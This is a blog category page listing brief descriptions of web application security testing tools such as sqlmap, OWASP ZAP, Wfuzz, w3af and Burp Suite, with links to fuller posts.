Category: Web Application Security

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2015/05/13/sqlmap-2/

IronWASP

ronwasp by Lavakumar is another great web application pentesting tools and like ZAP it also provides application proxy to intercept and perform manual testing. It has certain other features which are not provided by other similar tools, such as SSRF exploitation, SAP scanner and Scripting within the interface. Under the tools tab we can get …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2015/05/06/ironwasp/

OWASP Zed Attack Proxy Project

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2015/05/06/owasp-zed-attack-proxy-project/

Grendel-Scan

A tool for automated security scanning of web applications. Many features are also present for manual penetration testing. http://sourceforge.net/projects/grendel/files/

Permanent link to this article: https://www.darknessgate.com/2015/03/01/grendel-scan/

Wfuzz

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc. Some features: * Multiple Injection points capability with multiple dictionaries * Recursion (When doing …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2015/02/26/wfuzz/

The web-application vulnerability scanner

Wapiti allows you to audit the security of your web applications. It performs “black-box” scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2015/02/12/web-application-vulnerability-scanner/

ratproxy

A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments. Detects and prioritizes broad classes of security problems, such as dynamic cross-site trust model considerations, script …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2012/07/25/ratproxy/

Samurai Web Testing Framework

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2012/07/25/samurai-web-testing-framework/

Paros – for web application security assessment

“Paros” for people who need to evaluate the security of their web applications. It is free of charge and completely written in Java. Through Paros’s proxy nature, all HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified. Download Paros

Permanent link to this article: https://www.darknessgate.com/2012/07/25/paros-for-web-application-security-assessment/

W3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. Supported OS: Windows , Linux Download W3af

Permanent link to this article: https://www.darknessgate.com/2012/07/25/w3af/

Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Free Version Features: An intercepting proxy, which lets you inspect and modify traffic …

Continue reading

Permanent link to this article: https://www.darknessgate.com/2012/07/24/burp-suite/